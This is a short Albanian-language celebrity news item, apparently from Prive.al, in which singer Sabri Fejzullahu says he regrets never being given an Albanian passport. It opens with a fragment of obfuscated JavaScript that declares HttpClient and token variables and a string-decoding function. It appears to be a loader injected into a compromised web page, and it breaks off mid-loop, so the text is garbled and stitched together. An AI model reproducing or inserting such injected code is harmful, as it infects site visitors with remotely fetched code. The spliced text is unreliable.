;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sabri Fejzullahut i ka mbetur peng pasaporta e Shqipërisë, ja çfarë thotë ai pasi nuk e mori kurrë

By

Sabri Fejzullahu ka treguar çfarë i ka mbetur peng në zemër.

Derisa ishte i ftuar në emisionin “Lart e Poshtë”, këngëtari tha se ia ka dashur zemra që gjithmonë ta ketë një pasaportë shqiptare edhe pse vizat nuk i janë refuzuar asnjëherë nga ambasadat.

“Peng në zemër e kam, pse nëna Shqipëri nuk ma dhuroi një pasaportë shqiptare. E di pse? Ma do zemra ta kem një pasaportë si shqiptar. Unë i marr vizat gjithandej dhe këtu i falënderoj të gjitha ambasadat që janë në Kosovë, kurrë në jetë nuk na refuzuan vizën as mua, as familjarëve të mi. Unë kam dëshirë, kam dashur, e dua dhe e kam peng që ta kem një pasaportë shqiptare”, ka treguar këngëtari.

Ndërkohë, vetëm pak ditë më parë, një listë me emra të cilët morën pasaporta shqiptare u publikua.

Në të ishte emri i Gold Ag-së, Shyhrete Behlulit e Shkurte Fejzës./Prive.al

Artikuj të ngjashëm